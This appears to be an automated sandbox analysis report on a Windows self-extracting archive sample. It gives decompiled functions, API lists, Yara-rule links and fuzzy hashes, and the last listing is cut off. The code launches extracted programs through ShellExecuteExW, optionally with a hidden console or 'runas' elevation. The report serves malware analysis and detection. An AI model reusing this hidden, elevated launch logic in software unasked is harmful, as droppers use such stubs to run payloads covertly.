                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402008, Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 242COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00402008(signed int* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, signed int _a12) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v80;
				char _v92;
				char _v104;
				char _v120;
				void* _t55;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t64;
				signed int _t65;
				signed int _t66;
				signed int _t75;
				long _t77;
				long _t80;
				signed int _t88;
				signed int _t149;
				signed int* _t151;
				signed int _t152;
				signed int _t155;
				signed int _t156;
				void* _t157;

				_t151 = __ecx;
				_t159 = 0;
				_v20 = __edx;
				_v12 = 0;
				E004147DF(_t55,  &_v32);
				E00404255( &_v120, __edx, 0, _v20);
				_v16 = 0;
				_v5 = 0;
				E00405546(_t151, 0);
				_t152 =  *_t151;
				while(1) {
					L1:
					_t59 = E00404051(_t152, _t159, 0);
					_t159 = _t59;
					if(_t59 != 0) {
						break;
					}
					_t60 = E00404051(_t152, __eflags, 0);
					__eflags = _t60;
					if(__eflags != 0) {
						_v12 = _v12 | 0x00000001;
						_t152 = _t60;
						continue;
					}
					_t61 = E00404051(_t152, __eflags, 0);
					__eflags = _t61;
					if(__eflags != 0) {
						_t152 = _t61;
						__eflags =  *0x422740; // 0x1
						if(__eflags != 0) {
							L10:
							_v12 = _v12 | 0x00010000;
						}
						continue;
						L11:
						_t63 = E00404051(_t152, __eflags, 2);
						_t149 = _t63;
						__eflags = _t149;
						if(__eflags != 0) {
							__eflags =  *0x422468 - 0xffffffff;
							if(__eflags == 0) {
								_t156 = _t152 + 4;
								__eflags = _t156;
								__imp___wtol(_t156);
								 *0x422468 = _t63;
							}
							_t152 = _t149;
							continue;
						}
						_t64 = E00404051(_t152, __eflags, 3);
						__eflags = _t64;
						if(__eflags != 0) {
							L17:
							_t152 = _t64;
							continue;
						}
						_t64 = E00404051(_t152, __eflags, 3);
						__eflags = _t64;
						if(__eflags != 0) {
							goto L17;
						}
						_t65 = E004040D6(_t152, __eflags);
						__eflags = _t65;
						if(__eflags != 0) {
							_t152 = _t65;
							_v16 = 1;
							continue;
						}
						_t66 = E0040413E(_t152, __eflags);
						__eflags = _t66;
						if(__eflags != 0) {
							_t152 = _t66;
							_v16 = 2;
							continue;
						}
						_t150 = "\"";
						__eflags = _a4;
						if(_a4 == 0) {
							E004148C7( &_v32, _a8);
							goto L29;
						} else {
							__eflags =  *_t152 - 0x22;
							if( *_t152 == 0x22) {
								E00414864( &_v32, _t152);
							} else {
								E00414864( &_v32, "\"");
								E00414922( &_v32, _t152);
								E00414922( &_v32, "\"");
							}
							_t152 = E00404F59();
							__eflags = _t152;
							if(_t152 != 0) {
								E00414922( &_v32, " ");
								L29:
								_t68 = E00414922( &_v32, _t152);
							}
						}
						E004147DF(_t68,  &_v56);
						E00414803( &_v44, E00403022(_v32,  &_v56));
						E00405546( &_v56, __eflags);
						__eflags =  *0x4228d8; // 0x0
						if(__eflags == 0) {
							_t75 = E00401C2A(_v16);
							__eflags = _t75;
							if(_t75 == 0) {
								goto L42;
							} else {
								_t155 = _a12;
								__eflags =  *_t155;
								if(__eflags != 0) {
									E00414922( &_v44, _t155);
									while(1) {
										__eflags =  *_t155;
										if(__eflags == 0) {
											goto L36;
										}
										_t155 = _t155 + 2;
										__eflags = _t155;
									}
								}
								L36:
								E00405546( &_v44, __eflags);
								__eflags = _v5;
								if(__eflags != 0) {
									_t144 = _v44;
									_t77 = E00401D63(_v56, _v44, __eflags, _v12);
									__eflags = _t77;
									if(_t77 != 0) {
										SetLastError(_t77);
										goto L44;
									} else {
										goto L41;
									}
								} else {
									E00414803( &_v68,  *((intOrPtr*)(E0041476B( &_v80, E00414787( &_v92, E004147B1( &_v104, _t150,  &_v56), L"\" "),  &_v44))));
									_push(_v80);
									L0041C160();
									_push(_v92);
									L0041C160();
									_push(_v104);
									L0041C160();
									_t144 = _v12;
									_t157 = _t157 + 0xc;
									_t88 = E00401C59(_v68, _v12, __eflags, _v20); // executed
									_push(_v68);
									__eflags = _t88;
									if(_t88 == 0) {
										L0041C160();
										L44:
										__eflags =  *0x422774 & 0x00000010;
										if(( *0x422774 & 0x00000010) == 0) {
											L46:
											E00409684(_t144, 1, 0x10, _v32);
										} else {
											_t80 = GetLastError();
											__eflags = _t80 - 0x4c7;
											if(_t80 != 0x4c7) {
												goto L46;
											}
										}
										E00405A7A();
										_push(9);
										_pop(1);
									} else {
										L0041C160();
										L41:
										E00401BCE();
										goto L42;
									}
								}
							}
						}
						_push(_v44);
						L0041C160();
						_push(_v56);
						L0041C160();
						E00402FC9( &_v120);
						_push(_v32);
						L0041C160();
						return 1;
					}
					_t62 = E00404051(_t152, __eflags, 0);
					__eflags = _t62;
					if(__eflags != 0) {
						_t152 = _t62;
						goto L10;
					}
					goto L11;
				}
				_t152 = _t59;
				_v5 = 1;
				goto L1;
			}


































                                          0x00402010
                                          0x00402012
                                          0x00402018
                                          0x0040201b
                                          0x0040201e
                                          0x00402029
                                          0x00402030
                                          0x00402033
                                          0x00402036
                                          0x0040203b
                                          0x0040203d
                                          0x0040203d
                                          0x00402045
                                          0x0040204a
                                          0x0040204c
                                          0x00000000
                                          0x00000000
                                          0x0040205e
                                          0x00402063
                                          0x00402065
                                          0x00402067
                                          0x0040206b
                                          0x00000000
                                          0x0040206b
                                          0x00402077
                                          0x0040207c
                                          0x0040207e
                                          0x00402080
                                          0x00402082
                                          0x00402088
                                          0x0040209f
                                          0x0040209f
                                          0x0040209f
                                          0x00000000
                                          0x004020a8
                                          0x004020b1
                                          0x004020b6
                                          0x004020b8
                                          0x004020ba
                                          0x004020bc
                                          0x004020c3
                                          0x004020c5
                                          0x004020c5
                                          0x004020c9
                                          0x004020d0
                                          0x004020d0
                                          0x004020d5
                                          0x00000000
                                          0x004020d5
                                          0x004020e5
                                          0x004020ea
                                          0x004020ec
                                          0x00402100
                                          0x00402100
                                          0x00000000
                                          0x00402100
                                          0x004020f7
                                          0x004020fc
                                          0x004020fe
                                          0x00000000
                                          0x00000000
                                          0x00402109
                                          0x0040210e
                                          0x00402110
                                          0x00402112
                                          0x00402114
                                          0x00000000
                                          0x00402114
                                          0x00402122
                                          0x00402127
                                          0x00402129
                                          0x0040212b
                                          0x0040212d
                                          0x00000000
                                          0x0040212d
                                          0x00402139
                                          0x00402141
                                          0x00402144
                                          0x00402190
                                          0x00000000
                                          0x00402146
                                          0x00402146
                                          0x0040214a
                                          0x00402167
                                          0x0040214c
                                          0x0040214d
                                          0x00402156
                                          0x0040215f
                                          0x0040215f
                                          0x00402178
                                          0x0040217a
                                          0x0040217c
                                          0x00402186
                                          0x00402195
                                          0x00402199
                                          0x00402199
                                          0x0040217c
                                          0x004021a1
                                          0x004021b5
                                          0x004021bd
                                          0x004021c2
                                          0x004021c8
                                          0x004021d1
                                          0x004021d6
                                          0x004021d8
                                          0x00000000
                                          0x004021de
                                          0x004021de
                                          0x004021e1
                                          0x004021e4
                                          0x004021ea
                                          0x004021f4
                                          0x004021f4
                                          0x004021f7
                                          0x00000000
                                          0x00000000
                                          0x004021f1
                                          0x004021f1
                                          0x004021f1
                                          0x004021f4
                                          0x004021f9
                                          0x004021fc
                                          0x00402201
                                          0x00402204
                                          0x0040227e
                                          0x00402284
                                          0x00402289
                                          0x0040228b
                                          0x00402298
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402206
                                          0x00402236
                                          0x0040223b
                                          0x0040223e
                                          0x00402243
                                          0x00402246
                                          0x0040224b
                                          0x0040224e
                                          0x00402253
                                          0x00402259
                                          0x0040225f
                                          0x00402264
                                          0x00402267
                                          0x00402269
                                          0x00402273
                                          0x0040229e
                                          0x0040229e
                                          0x004022a5
                                          0x004022b4
                                          0x004022bb
                                          0x004022a7
                                          0x004022a7
                                          0x004022ad
                                          0x004022b2
                                          0x00000000
                                          0x00000000
                                          0x004022b2
                                          0x004022c3
                                          0x004022c8
                                          0x004022ca
                                          0x0040226b
                                          0x0040226b
                                          0x0040228d
                                          0x0040228d
                                          0x00000000
                                          0x0040228d
                                          0x00402269
                                          0x00402204
                                          0x004021d8
                                          0x004022cb
                                          0x004022ce
                                          0x004022d3
                                          0x004022d6
                                          0x004022e0
                                          0x004022e5
                                          0x004022e8
                                          0x004022f4
                                          0x004022f4
                                          0x00402094
                                          0x00402099
                                          0x0040209b
                                          0x0040209d
                                          0x00000000
                                          0x0040209d
                                          0x00000000
                                          0x0040209b
                                          0x0040204e
                                          0x00402050
                                          0x00000000

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                            • Part of subcall function 00404255: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0042289C,?,?,00000000,0040202E,00000000,0042289C,?,00000000), ref: 00404273
                                            • Part of subcall function 00404255: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000,?,00000000,0040202E,00000000,0042289C,?,00000000), ref: 00404286
                                          • _wtol.MSVCRT(?,00000002,00000000,00000000,00000000,00000000,00000000,0042289C,?,00000000), ref: 004020C9
                                            • Part of subcall function 00414864: ??2@YAPAXI@Z.MSVCRT ref: 00414896
                                            • Part of subcall function 00414864: ??3@YAXPAX@Z.MSVCRT ref: 0041489F
                                            • Part of subcall function 00414864: memcpy.MSVCRT ref: 004148B7
                                            • Part of subcall function 004148C7: ??2@YAPAXI@Z.MSVCRT ref: 004148EF
                                            • Part of subcall function 004148C7: ??3@YAXPAX@Z.MSVCRT ref: 004148F8
                                            • Part of subcall function 004148C7: memcpy.MSVCRT ref: 00414912
                                            • Part of subcall function 00414922: memcpy.MSVCRT ref: 0041494F
                                            • Part of subcall function 00414803: memcpy.MSVCRT ref: 00414829
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040223E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00402246
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040224E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040226B
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00402273
                                            • Part of subcall function 00401D63: GetCommandLineW.KERNEL32(0041D9F0,00000000,00000000), ref: 00401D85
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E31
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E39
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E41
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E49
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E51
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E59
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E61
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E69
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E71
                                            • Part of subcall function 00401D63: ??3@YAXPAX@Z.MSVCRT ref: 00401E79
                                            • Part of subcall function 00401D63: GetStartupInfoW.KERNEL32(?,00000022,?,00000020,?,?,00000000,0000003A,?," -,sfxwaitall), ref: 00401E8C
                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,00000003,00000003,00000002,00000000,00000000,00000000,00000000,00000000,0042289C,?,00000000), ref: 00402298
                                          • GetLastError.KERNEL32(00000000,0042289C,?,00000000), ref: 004022A7
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004022CE
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004022D6
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004022E8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$memcpy$??2@$CurrentDirectoryErrorLast$CommandInfoLineStartup_wtol
                                          • String ID: ExecuteParameters$del$forcenowait$hidcon$nowait$shc$waitall
                                          • API String ID: 3919891259-4019298132
                                          • Opcode ID: 11f14fe54b5d0e7b02759e034190e851306b1f95e0a90f0cdd5974c248743fcd
                                          • Instruction ID: 21408dceba26f159f852cac34e7ef5db61450a97c3c3bcaf1411dbce6cc4b37b
                                          • Opcode Fuzzy Hash: 11f14fe54b5d0e7b02759e034190e851306b1f95e0a90f0cdd5974c248743fcd
                                          • Instruction Fuzzy Hash: 40818E71E00219ABCB14BBA1D985AEF7775AB80304F24407FE612772D1DABC5D86CB4D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403834, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 69timewindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E00403834(void* __edx) {
				struct tagRECT _v20;
				struct tagMSG _v48;
				struct HWND__* _t9;
				int _t21;
				int _t27;
				void* _t28;
				struct HWND__* _t29;

				_t28 = __edx;
				_t9 = CreateWindowExW(0x80, L"tooltips_class32", L"sfx", 0, 0, 0, 0, 0, 0, 0, GetModuleHandleW(0), 0); // executed
				_t29 = _t9;
				GetWindowRect(GetDesktopWindow(),  &_v20);
				asm("cdq");
				asm("cdq");
				_t21 = SetWindowPos(_t29, 0, _v20.right - _v20.left - _t28 >> 1, _v20.bottom - _v20.top - _t28 >> 1, 0, 0, 4);
				if(_t29 != 0) {
					SetTimer(_t29, 1, 1, 0); // executed
					GetMessageW( &_v48, 0, 0, 0);
					DispatchMessageW( &_v48);
					_t27 = KillTimer(_t29, 1);
					 *0x42272c = _t29;
					return _t27;
				}
				return _t21;
			}










                                          0x00403834
                                          0x0040385d
                                          0x00403863
                                          0x00403870
                                          0x0040387e
                                          0x0040388c
                                          0x00403894
                                          0x0040389c
                                          0x004038a4
                                          0x004038b1
                                          0x004038bb
                                          0x004038c4
                                          0x004038ca
                                          0x00000000
                                          0x004038ca
                                          0x004038d3

                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00406043,?,00000000), ref: 00403840
                                          • CreateWindowExW.USER32 ref: 0040385D
                                          • GetDesktopWindow.USER32 ref: 00403869
                                          • GetWindowRect.USER32 ref: 00403870
                                          • SetWindowPos.USER32(00000000,00000000,?,00406043,00000000,00000000,00000004), ref: 00403894
                                          • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 004038A4
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004038B1
                                          • DispatchMessageW.USER32 ref: 004038BB
                                          • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,00406043,?,00000000), ref: 004038C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Window$MessageTimer$CreateDesktopDispatchHandleKillModuleRect
                                          • String ID: sfx$tooltips_class32
                                          • API String ID: 3184818434-2224206080
                                          • Opcode ID: 3563f08bb3cb8092991ced233f77f7c04de6a27a174827c095c902f2545c8bd1
                                          • Instruction ID: 0e7f13be778ebd409a4db15796a4025058a8725858d3a305ba7ca36a6b4cbd87
                                          • Opcode Fuzzy Hash: 3563f08bb3cb8092991ced233f77f7c04de6a27a174827c095c902f2545c8bd1
                                          • Instruction Fuzzy Hash: 95115EB2A01224BBCB109BB99D4DEEF7F7DEF49751F008160F615E2094CAB49100CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041C35F, Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0x41fa80);
				_push(0x41c4f0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x426c88 =  *0x426c88 | 0xffffffff;
				 *0x426c8c =  *0x426c8c | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x424c74; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x424c70; // 0x0
				 *_t24 = _t47;
				 *0x426c84 = _adjust_fdiv;
				_t27 = E0041C4EB( *_adjust_fdiv);
				_t60 =  *0x4226f0; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E0041C4E8);
					_pop(_t47);
				}
				E0041C4D6(_t27);
				_push(0x422080);
				_push(0x42207c);
				L0041C4D0();
				_t29 =  *0x424c6c; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x424c68,  &_v112);
				_push(0x422078);
				_push(0x422000); // executed
				L0041C4D0(); // executed
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while( *_t54 > 0x20) {
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t42 =  *_t54;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t54);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00407014(_t47);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0041C4CA();
				return _t41;
			}





























                                          0x0041c362
                                          0x0041c364
                                          0x0041c369
                                          0x0041c374
                                          0x0041c375
                                          0x0041c382
                                          0x0041c387
                                          0x0041c38c
                                          0x0041c393
                                          0x0041c39a
                                          0x0041c3a1
                                          0x0041c3a7
                                          0x0041c3ad
                                          0x0041c3af
                                          0x0041c3b5
                                          0x0041c3bb
                                          0x0041c3c4
                                          0x0041c3c9
                                          0x0041c3ce
                                          0x0041c3d4
                                          0x0041c3db
                                          0x0041c3e1
                                          0x0041c3e1
                                          0x0041c3e2
                                          0x0041c3e7
                                          0x0041c3ec
                                          0x0041c3f1
                                          0x0041c3f6
                                          0x0041c3fb
                                          0x0041c414
                                          0x0041c41a
                                          0x0041c41f
                                          0x0041c424
                                          0x0041c431
                                          0x0041c433
                                          0x0041c439
                                          0x0041c475
                                          0x0041c47a
                                          0x0041c47b
                                          0x0041c47b
                                          0x0041c43b
                                          0x0041c43b
                                          0x0041c43b
                                          0x0041c43c
                                          0x0041c43f
                                          0x0041c441
                                          0x0041c44c
                                          0x0041c44e
                                          0x0041c44e
                                          0x0041c44f
                                          0x0041c44f
                                          0x0041c44c
                                          0x0041c452
                                          0x0041c456
                                          0x00000000
                                          0x00000000
                                          0x0041c45c
                                          0x0041c463
                                          0x0041c46d
                                          0x0041c482
                                          0x0041c46f
                                          0x0041c46f
                                          0x0041c46f
                                          0x0041c483
                                          0x0041c484
                                          0x0041c485
                                          0x0041c48d
                                          0x0041c48e
                                          0x0041c493
                                          0x0041c497
                                          0x0041c49d
                                          0x0041c4a2
                                          0x0041c4a4
                                          0x0041c4a7
                                          0x0041c4a8
                                          0x0041c4a9
                                          0x0041c4b0

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                          • String ID:
                                          • API String ID: 801014965-0
                                          • Opcode ID: 6ba2aeb5cbc5bc23aab9a516162c53aab4a9e006d365dc7ef0cafc49e58abbcf
                                          • Instruction ID: 67ce4814ce78279d72a23206d993da328827abf4023638930e906dbcac5dfea8
                                          • Opcode Fuzzy Hash: 6ba2aeb5cbc5bc23aab9a516162c53aab4a9e006d365dc7ef0cafc49e58abbcf
                                          • Instruction Fuzzy Hash: 0E418EB1D84354AFDB209FA5DC95AFA7BB8FB09714F20422BF491972A1C7784881CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401C59, Relevance: 15.1, APIs: 10, Instructions: 84synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E00401C59(intOrPtr __ecx, signed int __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				char _v32;
				struct _SHELLEXECUTEINFOW _v92;
				void* _t36;
				struct HWND__* _t42;
				int _t50;
				int _t51;
				signed int _t55;
				signed int _t56;
				int _t66;

				_v8 = __ecx;
				_t55 = __edx;
				E004147DF(E004147DF(_t36,  &_v20),  &_v32);
				_t66 = 0;
				memset( &_v92, 0, 0x3c);
				_v92.cbSize = 0x3c;
				_v92.lpDirectory = _a4;
				_v92.fMask = 0x740;
				_v92.nShow = 0xa;
				if((_t55 & 0x00000001) != 0) {
					_v92.nShow = 0;
					_v92.fMask = 0x8740;
				}
				if((_t55 & 0x00000002) != 0) {
					_v92.lpVerb = L"runas";
				}
				_t56 = _t55 & 0x00010000;
				if(_t56 == 0) {
					_v92.fMask = _v92.fMask | 0x00000100;
				}
				_t42 =  *0x42272c; // 0x60082
				_v92.hwnd = _t42;
				ShowWindow(_t42, 5); // executed
				BringWindowToTop(_v92.hwnd);
				E00414864( &_v32, E00403022(_v8,  &_v20));
				if(_v16 != _t66) {
					_v92.lpFile = _v20;
					_v92.lpParameters = _v32;
					_t50 = ShellExecuteExW( &_v92); // executed
					if(_t50 != 0) {
						if(_t56 == _t66) {
							WaitForSingleObject(_v92.hProcess, 0xffffffff);
						}
						CloseHandle(_v92.hProcess);
						_t66 = 1;
					}
					_push(_v32);
					L0041C160();
					_push(_v20);
					L0041C160();
					_t51 = _t66;
				} else {
					_push(_v32);
					L0041C160();
					_push(_v20);
					L0041C160();
					_t51 = 1;
				}
				return _t51;
			}















                                          0x00401c60
                                          0x00401c67
                                          0x00401c71
                                          0x00401c78
                                          0x00401c7f
                                          0x00401c8a
                                          0x00401c91
                                          0x00401c94
                                          0x00401c9b
                                          0x00401ca5
                                          0x00401ca7
                                          0x00401caa
                                          0x00401caa
                                          0x00401cb4
                                          0x00401cb6
                                          0x00401cb6
                                          0x00401cbd
                                          0x00401cc3
                                          0x00401cc5
                                          0x00401cc5
                                          0x00401ccc
                                          0x00401cd4
                                          0x00401cd7
                                          0x00401ce0
                                          0x00401cf5
                                          0x00401cfd
                                          0x00401d17
                                          0x00401d1d
                                          0x00401d24
                                          0x00401d2c
                                          0x00401d30
                                          0x00401d37
                                          0x00401d37
                                          0x00401d40
                                          0x00401d48
                                          0x00401d48
                                          0x00401d49
                                          0x00401d4c
                                          0x00401d51
                                          0x00401d54
                                          0x00401d59
                                          0x00401cff
                                          0x00401cff
                                          0x00401d02
                                          0x00401d07
                                          0x00401d0a
                                          0x00401d11
                                          0x00401d11
                                          0x00401d60

                                          APIs
                                            • Part of subcall function 004147DF: ??2@YAPAXI@Z.MSVCRT ref: 004147E7
                                          • memset.MSVCRT ref: 00401C7F
                                          • ShowWindow.USER32(00060082,00000005,?,0041D9F0,00000000), ref: 00401CD7
                                          • BringWindowToTop.USER32 ref: 00401CE0
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401D02
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401D0A
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00401D24
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,0041D9F0,00000000), ref: 00401D37
                                          • CloseHandle.KERNEL32(?,?,0041D9F0,00000000), ref: 00401D40
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401D4C
                                          • ??3@YAXPAX@Z.MSVCRT ref: 00401D54
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.708189503.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.708184369.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708207849.000000000041D000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708216748.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.708225050.0000000000427000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ??3@$Window$??2@BringCloseExecuteHandleObjectShellShowSingleWaitmemset
                                          • String ID:
                                          • API String ID: 1117119541-0
                                          • Opcode ID: 702744099604b181f25300a2fa32d8a7473fe160c0b826c08e6b88afe4a0ff59
                                          • Instruction ID: 6f8207a67a2572a909a3f2a1a43fdbbd5cf9fef0efaf3e720be5f44350d0943e
                                          • Opcode Fuzzy Hash: 702744099604b181f25300a2fa32d8a7473fe160c0b826c08e6b88afe4a0ff59
                                          • Instruction Fuzzy Hash: 96318BB1D40208ABDF11EFE5DC89ADEBBB5FF84304F10802AE121B62A5DB785945CF08
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040468A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133stringtimeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E0040468A(WCHAR* __ecx, struct _FILETIME* __edx) {
				signed int _v8;
				WCHAR* _v12;
				struct _FILETIME _v20;
				char _v32;
				signed int _t38;
				signed int _t41;
				signed int _t44;
				signed short _t48;
				signed char _t52;
				signed int _t60;
				signed int* _t66;
				void* _t67;
				WCHAR* _t78;
				signed int _t79;
				void* _t81;
				void* _t82;

				_t77 = __edx;
				_t66 = __ecx;
				_v12 = __ecx;
				_t38 = lstrlenW(__ecx);
				_t79 = _t38;
				_v8 = _t38;
				E00414803( &_v32, _t66);
				_t78 = E0040420B( &_v32, _t77, 0);
				_t41 =  *(_t66 + _t79 * 2 - 2) & 0x0000ffff;
				if(_t41 == 0x5c || _t41 == 0x2f) {
					 *((short*)(_t78 + _t79 * 2 - 2)) = 0;
					_t79 = _t79 - 1;
					_v8 = _t79;
				}
				while(E00403092(_t78) == 0) {
					while(_t79 > 0) {
						_t44 = _t78[_t79] & 0x0000ffff;
						if(_t44 == 0x2f || _t44 == 0x5c) {
							break;
						} else {
							_t79 = _t79 - 1;
							continue;
						}
					}
					if(_t79 == 0) {
						if(_v8 != 2) {
							L30:
							E00409684(_t77, 1, 0xc, _t66);
							_push(_v32);
							L0041C160();
							return 0;
						}
						_t48 =  *_t66 | 0x00000020;
						if(_t48 < 0x61 || _t48 > 0x7a || _t66[0] != 0x3a) {
							goto L30;
						} else {
							_t81 = 1;
							L29:
							_push(_v32);
							L0041C160();
							return _t81;
						}
					}
					_t78[_t79] = 0;
				}
				GetSystemTimeAsFileTime( &_v20);
				_t52 = GetFileAttributesW(_t78); // executed
				if((_t52 & 0x00000010) != 0) {
					L13:
					while(E00403092(_t78) != 0) {
						if(_t79 < _v8) {
							_t67 =  &(_t78[_t79]);
							memcpy(_t67, _v12 + _t79 * 2, _v8 - _t79 + 1);
							_t82 = _t82 + 0xc;
							if( *_t67 == 0) {
								L20:
								if(_t78[_t79] != 0) {
									_t60 = _t78[_t79] & 0x0000ffff;
									if(_t60 == 0x5c || _t60 == 0x2f) {
										goto L21;
									} else {
										L19:
										_t79 = _t79 + 1;
										goto L20;
									}
								}
								L21:
								_t78[_t79] = 0;
								continue;
							}
							goto L19;
						}
						_push(_v32);
						L0041C160();
						return 1;
					}
					E00409684(_t77, 1, 0xc, _t78);
					L12:
					_t81 = 0;
					goto L29;
				}
				_t77 =  &_v20;
				if(E00404402(_t78,  &_v20) == 0) {
					goto L13;
				}
				goto L12;
			}



















                                          0x0040468a
                                          0x00404692
                                          0x00404696
                                          0x00404699
                                          0x004046a3
